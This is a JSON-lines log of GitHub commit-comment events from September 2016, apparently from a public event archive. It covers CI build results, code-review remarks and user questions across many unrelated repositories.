{"id":"4609274121","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148295,"position":null,"line":null,"path":null,"commit_id":"47f765c611c33b277a621019e2825d10c59e54b2","created_at":"2016-09-23T15:35:56Z","updated_at":"2016-09-23T15:35:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1153](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14185&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:12:07"}},"created_at":"2016-09-23T15:35:56Z"}
{"id":"4609274750","type":"CommitCommentEvent","actor":{"login":"topsecretcoder"},"repo":{"name":"mkazzam/Hydrogen"},"payload":{"comment":{"id":19148297,"position":null,"line":null,"path":null,"commit_id":"6a31596b7a7496902560608a1a682bdbc04607b3","created_at":"2016-09-23T15:36:03Z","updated_at":"2016-09-23T15:36:03Z","body":"Hi,\r\n\r\nChallenge will close on the 03/10/2016, please raise your pull request to have your code evaluated.\r\n\r\nRegards,\r\nTopSecretCoder"}},"created_at":"2016-09-23T15:36:03Z"}
{"id":"4609275358","type":"CommitCommentEvent","actor":{"login":"xchapter7x"},"repo":{"name":"enaml-ops/pluginlib"},"payload":{"comment":{"id":19148299,"position":13,"line":45,"path":"product/types.go","commit_id":"2d571002ce62d4347cf2d57345e5077f7a860c08","created_at":"2016-09-23T15:36:10Z","updated_at":"2016-09-23T15:36:10Z","body":"https://groups.google.com/forum/#!topic/golang-dev/Cua1Av1J8Nc\r\n\r\nrob pike says differently :) ... i implemented it this way based on the above thread "}},"created_at":"2016-09-23T15:36:10Z"}
{"id":"4609279016","type":"CommitCommentEvent","actor":{"login":"sashahart"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19148305,"position":null,"line":null,"path":null,"commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-23T15:36:49Z","updated_at":"2016-09-23T15:36:49Z","body":"I completely understand, and I wish I had more free time to help just now. It's a mark of how well you are documenting what you're doing that this kind of thing can be caught from commit messages.\r\n\r\nI don't understand that mod_wsgi error message and I hope it's just confusingly written."}},"created_at":"2016-09-23T15:36:49Z"}
{"id":"4609280140","type":"CommitCommentEvent","actor":{"login":"Dembelo-Jessica"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19148306,"position":null,"line":null,"path":null,"commit_id":"7109d7409f168a3510ed89b71a1016ecdc3ac12d","created_at":"2016-09-23T15:37:01Z","updated_at":"2016-09-23T15:37:01Z","body":"Optisch sehr ansprechend. Was in welchem Menü sein sollte, hab ich gerade nicht mehr parat. Hilfe?"}},"created_at":"2016-09-23T15:37:01Z"}
{"id":"4609285698","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19148319,"position":null,"line":null,"path":null,"commit_id":"2902c68b7afda7737b2d9166235e91c38bad92be","created_at":"2016-09-23T15:38:03Z","updated_at":"2016-09-23T15:38:03Z","body":"Yeah!"}},"created_at":"2016-09-23T15:38:03Z"}
{"id":"4609290869","type":"CommitCommentEvent","actor":{"login":"Kalaborative"},"repo":{"name":"Kalaborative/Project-ziablo"},"payload":{"comment":{"id":19148357,"position":27,"line":20,"path":"jj_slice_calc.py","commit_id":"672df215918f77780e0b15a708391222dcc5d09c","created_at":"2016-09-23T15:38:57Z","updated_at":"2016-09-23T15:38:57Z","body":"Although using globals is dangerous, it's effective for the purpose o this code"}},"created_at":"2016-09-23T15:38:57Z"}
{"id":"4609293397","type":"CommitCommentEvent","actor":{"login":"RileyDavidson"},"repo":{"name":"Peter-Wilson/Flock"},"payload":{"comment":{"id":19148362,"position":null,"line":null,"path":null,"commit_id":"04c77666f953cd0450f5d6e79908922ed361edfe","created_at":"2016-09-23T15:39:24Z","updated_at":"2016-09-23T15:39:24Z","body":"So the flow now is\r\n\r\n1. Login page\r\n2. Camera opens once login pressed\r\n3. User takes a picture\r\n4. It closes the camera which reopens the login page since its still in the LoginActivity\r\n5. It stays on the login page until the picture is finished processing\r\n6. Start the main activity.\r\n\r\nMaybe have a state on the LoginActivity to display a loading message/spinner while it's in a loading state since its the activity that's active while its loading? Not sure how to do that though."}},"created_at":"2016-09-23T15:39:24Z"}
{"id":"4609294040","type":"CommitCommentEvent","actor":{"login":"romeof1980"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19148363,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-23T15:39:31Z","updated_at":"2016-09-23T15:39:31Z","body":"Simple workaround:\nfrom magento backend go to email templates then \"hover\" on the logo and take note of the logo's path and logo's name. Create the missing folders (via ssh or ftp) then upload the logo there (name has to be the same)\n\n---- On Fri, 23 Sep 2016 17:18:17 +0200 notifications@github.com wrote ----\n\nIts still the same in mag 2.1.1 its not fixed at all\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2016-09-23T15:39:31Z"}
{"id":"4609300546","type":"CommitCommentEvent","actor":{"login":"andy-ms"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19148373,"position":null,"line":null,"path":null,"commit_id":"1adaa22d7a6cc83ce09638e2cae00fc6f6589857","created_at":"2016-09-23T15:40:41Z","updated_at":"2016-09-23T15:40:41Z","body":"Hi @kunnix, could you identify the parts that have broken and make PRs to fix them? See also #11431 and #11433."}},"created_at":"2016-09-23T15:40:41Z"}
{"id":"4609302112","type":"CommitCommentEvent","actor":{"login":"yad"},"repo":{"name":"Bogala/webpack-starter"},"payload":{"comment":{"id":19148374,"position":5,"line":235,"path":"Step1/README.md","commit_id":"26dfcac7c094bfcba3870b90f7ae823ce0f2c829","created_at":"2016-09-23T15:40:57Z","updated_at":"2016-09-23T15:40:57Z","body":"Cool tu as corrigé ma remarque !"}},"created_at":"2016-09-23T15:40:57Z"}
{"id":"4609302625","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"ember-learn/ember-help-wanted-backend"},"payload":{"comment":{"id":19148377,"position":13,"line":9,"path":"README.md","commit_id":"073dcef8cbabe2db168f887e8ad1a3ba569a3ad4","created_at":"2016-09-23T15:41:03Z","updated_at":"2016-09-23T15:41:03Z","body":"should just be `denali`"}},"created_at":"2016-09-23T15:41:03Z"}
{"id":"4609307073","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19148388,"position":null,"line":null,"path":null,"commit_id":"f03b5be572d2fea85f1b644b27dd0a0df469caaf","created_at":"2016-09-23T15:41:52Z","updated_at":"2016-09-23T15:41:52Z","body":"It might be worth writing a pending spec, so that we don't forget to test it later."}},"created_at":"2016-09-23T15:41:52Z"}
{"id":"4609307555","type":"CommitCommentEvent","actor":{"login":"aminmeyghani"},"repo":{"name":"aminmeyghani/webpack-book"},"payload":{"comment":{"id":19148389,"position":4,"line":4,"path":"chapters/chapter0-preface/0-preface.md","commit_id":"ff1def1414aa2a644e9a418007f2114315ba6422","created_at":"2016-09-23T15:41:58Z","updated_at":"2016-09-23T15:41:58Z","body":"Thank you @bzin "}},"created_at":"2016-09-23T15:41:58Z"}
{"id":"4609307667","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19148390,"position":null,"line":null,"path":null,"commit_id":"f03b5be572d2fea85f1b644b27dd0a0df469caaf","created_at":"2016-09-23T15:41:59Z","updated_at":"2016-09-23T15:41:59Z","body":"Also, thanks for fixing this!"}},"created_at":"2016-09-23T15:41:59Z"}
{"id":"4609308069","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148392,"position":null,"line":null,"path":null,"commit_id":"8674d72edf863314b1e80de3d3453cdafd2f1c7f","created_at":"2016-09-23T15:42:04Z","updated_at":"2016-09-23T15:42:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1154](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14192&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 252, ignored: 3 Build time: 00:10:00"}},"created_at":"2016-09-23T15:42:04Z"}
{"id":"4609308273","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"ember-learn/ember-help-wanted-backend"},"payload":{"comment":{"id":19148393,"position":13,"line":9,"path":"README.md","commit_id":"073dcef8cbabe2db168f887e8ad1a3ba569a3ad4","created_at":"2016-09-23T15:42:07Z","updated_at":"2016-09-23T15:42:07Z","body":"Added it to denali app blueprint"}},"created_at":"2016-09-23T15:42:07Z"}
{"id":"4609310482","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"TimMorency/Roomie"},"payload":{"comment":{"id":19148398,"position":null,"line":null,"path":null,"commit_id":"a3e338bfcffa050ea1434a2002a80fe57fe5e5a8","created_at":"2016-09-23T15:42:30Z","updated_at":"2016-09-23T15:42:30Z","body":"Good work getting hibernate in your project right away.  \r\n\r\nIn your tests, you create a dao in each test - think about how you might reduce this redundant code.  "}},"created_at":"2016-09-23T15:42:30Z"}
{"id":"4609316787","type":"CommitCommentEvent","actor":{"login":"tawheeler"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19148419,"position":4,"line":18,"path":"src/BayesNets.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T15:43:37Z","updated_at":"2016-09-23T15:43:37Z","body":"If I have a PR on METADATA, but I now want to edit the tagging, is the best way to:\r\n\r\n- delete the PR\r\n- manually delete the tags\r\n- commit new things\r\n- retag\r\n- re-publish to METADATA?"}},"created_at":"2016-09-23T15:43:37Z"}
{"id":"4609317559","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"TimMorency/Roomie"},"payload":{"comment":{"id":19148422,"position":null,"line":null,"path":null,"commit_id":"32c6a03de6695d6995b144314d8e0ce7e481041d","created_at":"2016-09-23T15:43:46Z","updated_at":"2016-09-23T15:43:46Z","body":"Dao - I like that you made the search very flexible. Well done!  \r\n\r\nI'm curious why you choose to insert by individual field rather than passing in a roomate object?\r\n public roomMate insertNewRoomMate(String firstName, String lastName, String email, String phoneNumber) {"}},"created_at":"2016-09-23T15:43:46Z"}
{"id":"4609325352","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19148445,"position":null,"line":null,"path":null,"commit_id":"019d65ae1149420b8a773c99fc4f1a942b3117c8","created_at":"2016-09-23T15:45:07Z","updated_at":"2016-09-23T15:45:07Z","body":"This one is bad. I'll push a git to undo"}},"created_at":"2016-09-23T15:45:07Z"}
{"id":"4609328679","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19148453,"position":null,"line":null,"path":null,"commit_id":"df3ff94fd19710e3b4b72cd9bf44dc968611e367","created_at":"2016-09-23T15:45:41Z","updated_at":"2016-09-23T15:45:41Z","body":"This one no go as well. We need the $sql_inserts for site_links."}},"created_at":"2016-09-23T15:45:41Z"}
{"id":"4609330342","type":"CommitCommentEvent","actor":{"login":"xxtsam"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19148456,"position":null,"line":null,"path":null,"commit_id":"a38080adad9878a3295b9ee09eda096fd3ddee36","created_at":"2016-09-23T15:45:58Z","updated_at":"2016-09-23T15:45:58Z","body":"qual foi a mudança que teve? pq eu ja tinha fixado esse boss ontem, pelo meu ver as linhas estao do mesmo jeito."}},"created_at":"2016-09-23T15:45:58Z"}
{"id":"4609330970","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"vlee1/Programming-Language-Translator"},"payload":{"comment":{"id":19148459,"position":null,"line":null,"path":null,"commit_id":"a6b1dafc37ac32d8d97db08610bb58d19fb5642a","created_at":"2016-09-23T15:46:04Z","updated_at":"2016-09-23T15:46:04Z","body":"Hi Van, please swap out the use of jdbc here with Hibernate instead.Let me know when this is complete so I can give you credit for the Week 3 exercise."}},"created_at":"2016-09-23T15:46:04Z"}
{"id":"4609337524","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"vlee1/Programming-Language-Translator"},"payload":{"comment":{"id":19148470,"position":null,"line":null,"path":null,"commit_id":"81cea4ecf8f2abcd824a8cb2c2f8105195c07201","created_at":"2016-09-23T15:47:13Z","updated_at":"2016-09-23T15:47:13Z","body":"Missing unit test for the dao - again, let me know when this is complete."}},"created_at":"2016-09-23T15:47:13Z"}
{"id":"4609337711","type":"CommitCommentEvent","actor":{"login":"demillir"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19148471,"position":null,"line":null,"path":null,"commit_id":"184bf12d3e66abfb5dc7c8b8a948223111690470","created_at":"2016-09-23T15:47:15Z","updated_at":"2016-09-23T15:47:15Z","body":"Yay!  Thank you for adding altitude to the OSD!  This is something I was really hoping for."}},"created_at":"2016-09-23T15:47:15Z"}
{"id":"4609342555","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19148483,"position":null,"line":null,"path":null,"commit_id":"ad8e28c8cf2b447b726896e27f77596e9e4d3aeb","created_at":"2016-09-23T15:48:08Z","updated_at":"2016-09-23T15:48:08Z","body":"1. Check your db_user table, must have column `user_theme`\r\n2. Check your fusion_get_userdata(); function. https://github.com/php-fusion/PHP-Fusion/blob/9.02/includes/core_functions_include.php#L1532-L1548\r\n\r\nWhy is your site no user theme?"}},"created_at":"2016-09-23T15:48:08Z"}
{"id":"4609345320","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19148500,"position":81,"line":316,"path":"baggins/baggers/lsdi.py","commit_id":"f69d8bba83c3e215579a854d1d4f2650ca1639bd","created_at":"2016-09-23T15:48:38Z","updated_at":"2016-09-23T15:48:38Z","body":"Python bagit should generate the bagit info files for us.  The `make_bag` method takes a dictionary of metadata to be included in the bag info file and generates it for us.  I think we should rely on python-bagit to generate the bag files for us as much as possible, and only supplement if and where we need to."}},"created_at":"2016-09-23T15:48:38Z"}
{"id":"4609353290","type":"CommitCommentEvent","actor":{"login":"flexiondotorg"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19148524,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-23T15:50:04Z","updated_at":"2016-09-23T15:50:04Z","body":"Builds fails on Ubuntu 16.10 (as of today) now Linux 4.8 has landed."}},"created_at":"2016-09-23T15:50:04Z"}
{"id":"4609353541","type":"CommitCommentEvent","actor":{"login":"RTLM"},"repo":{"name":"RTLM/IFB299-Group-12"},"payload":{"comment":{"id":19148530,"position":null,"line":null,"path":null,"commit_id":"a3872e433054f124c434bcaad2204df84741b08b","created_at":"2016-09-23T15:50:06Z","updated_at":"2016-09-23T15:50:06Z","body":"Accidently removed WHERE clause in previous revision. Including fixed this functionality "}},"created_at":"2016-09-23T15:50:06Z"}
{"id":"4609354535","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19148534,"position":4,"line":35,"path":"baggins/baggers/lsdi.py","commit_id":"f69d8bba83c3e215579a854d1d4f2650ca1639bd","created_at":"2016-09-23T15:50:17Z","updated_at":"2016-09-23T15:50:17Z","body":"I'm not sure it makes sense to break all of these fields out separately.  Since the bagit `make_bag` method takes a dictionary of metadata to include in the bag info file, how about a `bag_info` method that returns a dict?"}},"created_at":"2016-09-23T15:50:17Z"}
{"id":"4609355637","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148541,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-23T15:50:27Z","updated_at":"2016-09-23T15:50:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1155](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14194&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Tests failed: 2 (2 new), passed: 227, ignored: 3) Build time: 00:09:29\n### Failed tests\n```\norg.genivi.sota.core.DeviceUpdatesResourceSpec.queue items includes update status: <no details avaliable>\n\norg.genivi.sota.resolver.daemon.PackageCreatedListenerSpec.saves package to database: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-23T15:50:27Z"}
{"id":"4609356370","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148542,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-23T15:50:35Z","updated_at":"2016-09-23T15:50:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1156](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14203&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T15:50:35Z"}
{"id":"4609357206","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148545,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-23T15:50:44Z","updated_at":"2016-09-23T15:50:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1157](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14205&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T15:50:44Z"}
{"id":"4609359546","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"rwinch/spring-framework"},"payload":{"comment":{"id":19148552,"position":5,"line":30,"path":"spring-test/src/test/java/org/springframework/test/web/MockHttpTests.java","commit_id":"be3f8c7f9e71c6fb6c65143c88925b79e8dddc78","created_at":"2016-09-23T15:51:09Z","updated_at":"2016-09-23T15:51:09Z","body":"@rwinch I can't seem to find `MockHttpRequestBuilders` in this branch. What am I missing? There o.s.t.w.http package only has a `result` sub-pcakage https://github.com/rwinch/spring-framework/tree/be3f8c7f9e71c6fb6c65143c88925b79e8dddc78/spring-test/src/main/java/org/springframework/test/web/http."}},"created_at":"2016-09-23T15:51:09Z"}
{"id":"4609360443","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":19148555,"position":5,"line":17,"path":"lib/mix/tasks/docs.ex","commit_id":"adfbbd1ef29d7bdba77bceef9a350a9f2eefc0bb","created_at":"2016-09-23T15:51:19Z","updated_at":"2016-09-23T15:51:19Z","body":":D"}},"created_at":"2016-09-23T15:51:19Z"}
{"id":"4609362899","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19148563,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T15:51:44Z","updated_at":"2016-09-23T15:51:44Z","body":"GOTV rtmps:\\/\\/wowza.stream.tvb.com \\ / vipo \\ / _definst_ \\ / mp4: vipo \\ / he8\\1658\\165789 \\ / / 1658. The mp4? Ts = 1474645870 & e497d1ec775d58814c256f213ba2a24 sig = 4\r\nHow much is the new address"}},"created_at":"2016-09-23T15:51:44Z"}
{"id":"4609365134","type":"CommitCommentEvent","actor":{"login":"abel406"},"repo":{"name":"sestoft/C5"},"payload":{"comment":{"id":19148570,"position":null,"line":null,"path":null,"commit_id":"04d22349bf237900bfb6847edd3e77aa22c7d1df","created_at":"2016-09-23T15:52:09Z","updated_at":"2016-09-23T15:52:09Z","body":"Could you please share the doxygen script to generate de docs please ?\r\n\r\nThanks in advance."}},"created_at":"2016-09-23T15:52:09Z"}
{"id":"4609368333","type":"CommitCommentEvent","actor":{"login":"claudiorivas"},"repo":{"name":"claudiorivas/prueba"},"payload":{"comment":{"id":19148579,"position":null,"line":null,"path":null,"commit_id":"fe2e88fdbafc235d4fa68cd3f52290d5435f6922","created_at":"2016-09-23T15:52:42Z","updated_at":"2016-09-23T15:52:42Z","body":"Mi primer commit"}},"created_at":"2016-09-23T15:52:42Z"}
{"id":"4609372103","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19148588,"position":1,"line":1,"path":"tests/fixtures/collections_sourceorganizations.txt","commit_id":"f69d8bba83c3e215579a854d1d4f2650ca1639bd","created_at":"2016-09-23T15:53:21Z","updated_at":"2016-09-23T15:53:21Z","body":"Waiting to hear confirmation from Emily or Kyle, but I think it would make sense to include this in the source code asa lookup we can reference - use something similar to the way we set the eulxml schema catalog path relative to the package no matter how it is installed, and update the setup.py to include the lookup file in the package data."}},"created_at":"2016-09-23T15:53:21Z"}
{"id":"4609373121","type":"CommitCommentEvent","actor":{"login":"FND"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19148592,"position":null,"line":null,"path":null,"commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-23T15:53:32Z","updated_at":"2016-09-23T15:53:32Z","body":"I don't have much to add here, but I did wanna thank @sashahart for his diligence. And of course I agree that cdent's commit messages are excellent."}},"created_at":"2016-09-23T15:53:32Z"}
{"id":"4609375437","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19148598,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T15:53:57Z","updated_at":"2016-09-23T15:53:57Z","body":"rtmps:\\/\\/wowza.stream.tvb.com\\/vipo\\/_definst_\\/mp4:vipo\\/he8\\/1658\\/165789\\/000000512170.mp4?ts=1474646014&sig=4ccfae3bebe470bd5f9ab6f3b5b9006e\r\n求解 好像都失效"}},"created_at":"2016-09-23T15:53:57Z"}
{"id":"4609377257","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19148603,"position":45,"line":76,"path":"baggins/baggers/lsdi.py","commit_id":"f69d8bba83c3e215579a854d1d4f2650ca1639bd","created_at":"2016-09-23T15:54:16Z","updated_at":"2016-09-23T15:54:16Z","body":"python-bagit generates the bagging date for us automatically."}},"created_at":"2016-09-23T15:54:16Z"}
{"id":"4609377880","type":"CommitCommentEvent","actor":{"login":"thingdeux"},"repo":{"name":"jjtriplei/AwwPoints"},"payload":{"comment":{"id":19148604,"position":43,"line":40,"path":"models/user.py","commit_id":"dc2d487f48e5874093db8e0db2241934f0007037","created_at":"2016-09-23T15:54:23Z","updated_at":"2016-09-23T15:54:23Z","body":"Please revert these changes"}},"created_at":"2016-09-23T15:54:23Z"}
{"id":"4609379086","type":"CommitCommentEvent","actor":{"login":"thingdeux"},"repo":{"name":"jjtriplei/AwwPoints"},"payload":{"comment":{"id":19148606,"position":58,"line":55,"path":"models/user.py","commit_id":"dc2d487f48e5874093db8e0db2241934f0007037","created_at":"2016-09-23T15:54:36Z","updated_at":"2016-09-23T15:54:36Z","body":"Also revert these."}},"created_at":"2016-09-23T15:54:36Z"}
{"id":"4609381840","type":"CommitCommentEvent","actor":{"login":"xchapter7x"},"repo":{"name":"enaml-ops/pluginlib"},"payload":{"comment":{"id":19148614,"position":10,"line":43,"path":"product/types.go","commit_id":"2d571002ce62d4347cf2d57345e5077f7a860c08","created_at":"2016-09-23T15:55:03Z","updated_at":"2016-09-23T15:55:03Z","body":"https://golang.org/pkg/net/rpc/#Client.Call\r\n\r\nonly takes an arg and a response"}},"created_at":"2016-09-23T15:55:03Z"}
{"id":"4609384455","type":"CommitCommentEvent","actor":{"login":"thingdeux"},"repo":{"name":"jjtriplei/AwwPoints"},"payload":{"comment":{"id":19148624,"position":25,"line":29,"path":"Awwpoints.py","commit_id":"dc2d487f48e5874093db8e0db2241934f0007037","created_at":"2016-09-23T15:55:30Z","updated_at":"2016-09-23T15:55:30Z","body":"Don't use the User constructor reserved for pulling data out of SQL directly here.\r\n\r\n---- It should be this:\r\nnew_user = User()\r\nnew_user.username = username # The one from the front-end\r\nnew_user.password = password # The one you got from the front-end\r\nnew_user.email = email # The one you got from the front-end\r\n\r\n# Catch potential errors from this and then return status to front-end\r\nnew_user.insert_into_database()"}},"created_at":"2016-09-23T15:55:30Z"}
{"id":"4609387887","type":"CommitCommentEvent","actor":{"login":"acrobat"},"repo":{"name":"Intracto/SecretSanta"},"payload":{"comment":{"id":19148636,"position":null,"line":null,"path":null,"commit_id":"700c626110a23881b6729ac60b046fc7a7789625","created_at":"2016-09-23T15:56:05Z","updated_at":"2016-09-23T15:56:05Z","body":":+1:"}},"created_at":"2016-09-23T15:56:05Z"}
{"id":"4609388799","type":"CommitCommentEvent","actor":{"login":"repli2dev"},"repo":{"name":"datoszs/czech-lawyers"},"payload":{"comment":{"id":19148639,"position":7,"line":54,"path":"app/Commands/UserCreate.php","commit_id":"8307df321e6f6507549e2ed5df278511166fd3ca","created_at":"2016-09-23T15:56:14Z","updated_at":"2016-09-23T15:56:14Z","body":"Hele ty jedes na windows, ze? Protoze me to na linuxu dungovalo spravne, takhle to reze dva posledni znaky"}},"created_at":"2016-09-23T15:56:14Z"}
{"id":"4609389652","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19148641,"position":null,"line":null,"path":null,"commit_id":"55ca362267b807103a39d7748851d0b89078ec9b","created_at":"2016-09-23T15:56:24Z","updated_at":"2016-09-23T15:56:24Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 260](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1223&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:26:17"}},"created_at":"2016-09-23T15:56:24Z"}
{"id":"4609392553","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19148645,"position":50,"line":81,"path":"baggins/baggers/lsdi.py","commit_id":"f69d8bba83c3e215579a854d1d4f2650ca1639bd","created_at":"2016-09-23T15:56:56Z","updated_at":"2016-09-23T15:56:56Z","body":"I'm not sure how (or if) we can calculate the bag size - it seems like something python-bagit should handle for us, although when I inspect the bags I'm generating I don't see a size.  I don't think we need to worry about it yet, but it is certainly not going to be a value we can look up."}},"created_at":"2016-09-23T15:56:56Z"}
{"id":"4609401428","type":"CommitCommentEvent","actor":{"login":"jpcsguru"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19148669,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-23T15:58:25Z","updated_at":"2016-09-23T15:58:25Z","body":"hi,\r\n   I tried that already and no good"}},"created_at":"2016-09-23T15:58:25Z"}
{"id":"4609401815","type":"CommitCommentEvent","actor":{"login":"lxhjdqw2"},"repo":{"name":"Exieros/D2JScriptsOfficial"},"payload":{"comment":{"id":19148671,"position":null,"line":null,"path":null,"commit_id":"144a2e2622abb4dc1a8887969a3ca3880da4cb9d","created_at":"2016-09-23T15:58:29Z","updated_at":"2016-09-23T15:58:29Z","body":"how to load jscripts ??"}},"created_at":"2016-09-23T15:58:29Z"}
{"id":"4609413911","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology/idyntree"},"payload":{"comment":{"id":19148696,"position":null,"line":null,"path":null,"commit_id":"9e9655eba3ea11b2b3fe8af92f925fb337208ecd","created_at":"2016-09-23T16:00:29Z","updated_at":"2016-09-23T16:00:29Z","body":"cc @fiorisi "}},"created_at":"2016-09-23T16:00:29Z"}
{"id":"4609416906","type":"CommitCommentEvent","actor":{"login":"NukeTheMoon"},"repo":{"name":"NukeTheMoon/MineMineMine"},"payload":{"comment":{"id":19148704,"position":null,"line":null,"path":null,"commit_id":"94ed037045588292a805b92dc3c6b56f9f7c4421","created_at":"2016-09-23T16:00:58Z","updated_at":"2016-09-23T16:00:58Z","body":"Also optimized certain particle effects and removed some unnecessary lights"}},"created_at":"2016-09-23T16:00:58Z"}
{"id":"4609417420","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148706,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-23T16:01:03Z","updated_at":"2016-09-23T16:01:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1157](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14205&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 224, ignored: 3 Build time: 00:10:18\n### Failed tests\n```\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-23T16:01:03Z"}
